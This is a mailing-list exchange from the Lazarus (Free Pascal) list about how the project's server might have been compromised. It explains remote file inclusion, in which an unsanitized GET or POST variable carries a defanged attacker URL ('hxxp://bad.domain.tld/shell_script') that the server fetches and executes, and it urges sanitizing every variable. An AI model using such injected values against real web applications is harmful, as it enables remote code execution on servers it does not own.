On 1/28/2010 02:55, Matt Shaffer wrote:
Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)
I don't think this scenario is extremely likely.
what is there to upload? all it takes is a var that is not properly sanitized
that references a shell script on another site which then executes in the
context of the server with the bad code... this is all too common an occurrence
as my IDS shows on my practically invisible site... this isn't sql injection or
anything like that but simply stuffing a POST or GET var with something like
"hxxp://bad.domain.tld/shell_script" and having the code actually get it and
execute it...
proper sanitizing of ALL vars, whether user input or "hidden" must be done in
any web application to ensure that what is being received is valid for the
application...
--
_______________________________________________
Lazarus mailing list
[email protected]
http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
